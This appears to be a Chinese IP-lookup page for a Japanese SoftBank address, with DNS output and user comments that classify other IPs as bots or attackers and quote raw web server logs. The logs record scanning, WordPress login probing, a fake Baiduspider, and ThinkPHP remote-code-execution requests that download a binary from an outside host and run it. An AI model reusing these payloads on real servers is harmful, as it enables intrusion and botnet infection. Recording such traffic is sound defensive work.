城市(city): unknown
省份(region): unknown
国家(country): Japan
运营商(isp): unknown
主机名(hostname): unknown
机构(organization): unknown
使用类型(Usage Type): unknown
b
; <<>> DiG 9.10.3-P4-Ubuntu <<>> 126.18.199.255
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 55517
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0
;; QUESTION SECTION:
;126.18.199.255. IN A
;; AUTHORITY SECTION:
. 30 IN SOA a.root-servers.net. nstld.verisign-grs.com. 2025012201 1800 900 604800 86400
;; Query time: 38 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Thu Jan 23 05:55:26 CST 2025
;; MSG SIZE rcvd: 107
255.199.18.126.in-addr.arpa domain name pointer softbank126018199255.bbtec.net.
Server: 183.60.83.19
Address: 183.60.83.19#53
Non-authoritative answer:
255.199.18.126.in-addr.arpa name = softbank126018199255.bbtec.net.
Authoritative answers can be found from:
| IP | 类型 | 评论内容 | 时间 |
|---|---|---|---|
| 64.233.172.176 | bots | 打开谷歌search console就会出现,国内的 64.233.172.176 - - [20/Apr/2019:10:50:07 +0800] "GET / HTTP/1.1" 200 3263 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 Google Favicon" 64.233.172.174 - - [20/Apr/2019:10:50:08 +0800] "GET /static/favicon.ico HTTP/1.1" 200 4286 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 Google Favicon" |
2019-04-20 10:51:45 |
| 203.208.60.97 | bots | Googlebot,中国谷歌 |
2019-04-19 16:45:34 |
| 120.92.90.154 | botsattack | 120.92.90.154 - - [17/Apr/2019:00:04:34 +0000] "POST /public/index.php HTTP/1.1" 404 15604 "-" "python-requests/2.21.0" 120.92.90.154 - - [17/Apr/2019:00:04:35 +0000] "GET /public/gqxuracc.php HTTP/1.1" 404 15604 "-" "python-requests/2.21.0" 120.92.90.154 - - [17/Apr/2019:00:04:35 +0000] "POST /public/index.php HTTP/1.1" 404 15604 "-" "python-requests/2.21.0" 120.92.90.154 - - [17/Apr/2019:00:04:35 +0000] "GET /public/gqxuracc.php HTTP/1.1" 404 15604 "-" "python-requests/2.21.0" |
2019-04-17 08:12:27 |
| 113.4.133.2 | attack | 攻击 端口扫描 |
2019-04-15 14:29:58 |
| 42.86.95.59 | bots | 42.86.95.59 - - [18/Apr/2019:10:45:19 +0800] "GET /otsmobile/app/mds/mgw.htm HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36" |
2019-04-18 10:46:06 |
| 205.205.150.9 | bots | 205.205.150.9 - - [17/Apr/2019:06:19:22 +0800] "GET / HTTP/1.1" 200 212220 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)" |
2019-04-17 08:05:47 |
| 200.53.15.17 | attack | 200.53.15.17 - - [21/Apr/2019:04:56:51 +0800] "GET /wp-login.php HTTP/1.1" 302 284 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1" 200.53.15.17 - - [21/Apr/2019:04:56:52 +0800] "GET /wp-login.php HTTP/1.1" 200 7801 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1" 200.53.15.17 - - [21/Apr/2019:04:56:52 +0800] "GET / HTTP/1.1" 301 283 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1" 200.53.15.17 - - [21/Apr/2019:04:56:53 +0800] "GET / HTTP/1.1" 200 93842 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1" |
2019-04-21 06:59:00 |
| 220.243.136.52 | bots | 220.243.136.52 - - [16/Apr/2019:05:35:14 +0800] "GET /index.php/2019/03/07/emmanuel_macron_2019_03_07_cn/ HTTP/1.1" 200 14049 "-" "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) A ppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.3610.661 Mobile Safari/537.36" 220.243.136.52 - - [16/Apr/2019:05:35:14 +0800] "GET /index.php/2019/03/18/zuckerberg_2019_03_18_cn/ HTTP/1.1" 200 13845 "-" "Mozilla/5.0 (Linux; Android 8.0; Pixel 2 Build/OPD3.170816.01 2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.6770.148 Mobile Safari/537.36" 220.243.136.241 - - [16/Apr/2019:05:35:14 +0800] "GET /index.php/2019/03/27/pinduoduo_2019_03_27_cn/ HTTP/1.1" 200 13846 "-" "Mozilla/5.0 (Linux; Android 8.0; Pixel 2 Build/OPD3.170816.01 2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.9046.518 Mobile Safari/537.36" 220.243.135.178 - - [16/Apr/2019:05:35:14 +0800] "GET /index.php/2019/02/06/pinduoduo_2019_02_06_cn/ HTTP/1.1" 200 13225 "-" "Mozilla/5.0 (Linux; Android 5.0; SM-G900P Build/LRX21T) Apple WebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3027.663 Mobile Safari/537.36" 220.243.136.52 - - [16/Apr/2019:05:35:14 +0800] "GET /index.php/2018/10/19/barack_obama_2018_10_19_cn/ HTTP/1.1" 200 12489 "-" "Mozilla/5.0 (Linux; Android 5.0; SM-G900P Build/LRX21T) App leWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.9976.504 Mobile Safari/537.36" |
2019-04-16 06:39:56 |
| 85.68.112.186 | botsattack | 85.68.112.186 - - [19/Apr/2019:04:39:13 +0800] "GET /xmlrpc.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1" 85.68.112.186 - - [19/Apr/2019:04:39:14 +0800] "GET /xmlrpc.php HTTP/1.1" 404 232 "-" "Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1" |
2019-04-19 04:40:01 |
| 111.183.231.29 | attackproxy | 伪装爬虫攻击 111.183.231.29 - - [23/Apr/2019:06:02:57 +0800] "HEAD / HTTP/1.1" 200 328 "http://118.24.13.245" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html" 111.183.231.29 - - [23/Apr/2019:06:02:57 +0800] "HEAD /alipay.html HTTP/1.1" 404 140 "http://118.24.13.245/alipay.html" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html" 111.183.231.29 - - [23/Apr/2019:06:02:57 +0800] "HEAD /88888888 HTTP/1.1" 404 140 "http://118.24.13.245/88888888" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html" 111.183.231.29 - - [23/Apr/2019:06:02:57 +0800] "GET /88888888 HTTP/1.1" 404 446 "http://118.24.13.245/88888888" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html" |
2019-04-23 08:09:54 |
| 14.29.116.223 | botsattack | 14.29.116.223 - - [18/Apr/2019:11:39:04 +0800] "GET /myadmin/scripts/setup.php HTTP/1.1" 301 194 "-" "ZmEu" 14.29.116.223 - - [18/Apr/2019:11:39:04 +0800] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 301 194 "-" "ZmEu" 14.29.116.223 - - [18/Apr/2019:11:39:04 +0800] "GET /pma/scripts/setup.php HTTP/1.1" 301 194 "-" "ZmEu" 14.29.116.223 - - [18/Apr/2019:11:39:04 +0800] "GET /MyAdmin/scripts/setup.php HTTP/1.1" 301 194 "-" "ZmEu" 14.29.116.223 - - [18/Apr/2019:11:39:04 +0800] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 301 194 "-" "ZmEu" 14.29.116.223 - - [18/Apr/2019:11:39:04 +0800] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 301 194 "-" "ZmEu" 14.29.116.223 - - [18/Apr/2019:11:39:04 +0800] "GET HTTP/1.1" 400 182 "-" "-" |
2019-04-18 11:39:46 |
| 122.152.211.94 | botsattack | 122.152.211.94 - - [18/Apr/2019:12:23:08 +0800] "GET /login HTTP/1.1" 301 194 "-" "-" 122.152.211.94 - - [18/Apr/2019:12:23:08 +0800] "GET /customers/1 HTTP/1.1" 301 194 "-" "-" 122.152.211.94 - - [18/Apr/2019:12:23:08 +0800] "GET /gs-guide-websocket/803/a8vbaovq/htmlfile?c=_jp.local HTTP/1.1" 301 194 "-" "-" 122.152.211.94 - - [18/Apr/2019:12:23:08 +0800] "GET /console/login/LoginForm.jsp HTTP/1.1" 301 194 "-" "-" 122.152.211.94 - - [18/Apr/2019:12:23:08 +0800] "POST /index.php?s=captcha HTTP/1.1" 301 194 "-" "-" 122.152.211.94 - - [18/Apr/2019:12:23:08 +0800] "GET /index.php?s=/Index/\\x5Cthink\\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=abc HTTP/1.1" 301 194 "-" "-" 122.152.211.94 - - [18/Apr/2019:12:23:08 +0800] "POST /website/blog/ HTTP/1.1" 301 194 "-" "-" |
2019-04-18 12:23:38 |
| 185.132.133.23 | proxy | 可能是代理检测吧 185.132.133.23 - - [19/Apr/2019:18:21:50 +0800] "CONNECT mobile.chomikuj.pl:80 HTTP/1.1" 400 182 "-" "-" |
2019-04-19 18:22:44 |
| 142.93.214.167 | attack | 142.93.214.167 - - [16/Apr/2019:06:00:02 +0800] "GET /public/index.php?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=cd%20/tmp;wget%20http://104.248.57.105/bins/element.x86;cat%20element.x86%20%3E%20hitler13;chmod%20777%20hitler13;./hitler13%20x86 HTTP/1.1" 301 194 "-" "python-requests/2.12.4" 142.93.214.167 - - [16/Apr/2019:06:00:04 +0800] "GET /public/index.php?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=cd%20/tmp;wget%20http://104.248.57.105/bins/element.x86;cat%20element.x86%20%3E%20hitler13;chmod%20777%20hitler13;./hitler13%20x86 HTTP/1.1" 404 209 "-" "python-requests/2.12.4" 142.93.214.167 - - [16/Apr/2019:06:00:06 +0800] "GET /public/index.php?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=cd%20/tmp;curl%20-O%20http://104.248.57.105/bins/element.x86;cat%20element.x86%20%3E%20hitler13;chmod%20777%20hitler13;./hitler13%20x86 HTTP/1.1" 301 194 "-" "python-requests/2.12.4" 142.93.214.167 - - [16/Apr/2019:06:00:08 +0800] "GET /public/index.php?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=cd%20/tmp;curl%20-O%20http://104.248.57.105/bins/element.x86;cat%20element.x86%20%3E%20hitler13;chmod%20777%20hitler13;./hitler13%20x86 HTTP/1.1" 404 209 "-" "python-requests/2.12.4" |
2019-04-16 06:28:55 |
| 196.22.201.51 | attack | 登录攻击 196.22.201.51 - - [22/Apr/2019:12:36:06 +0800] "POST https://www.eznewstoday.com/wp-login.php HTTP/1.1" 200 5534 "https://www.eznewstoday.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.60.13) Gecko/20172285 Firefox/45.60.13" |
2019-04-22 12:37:16 |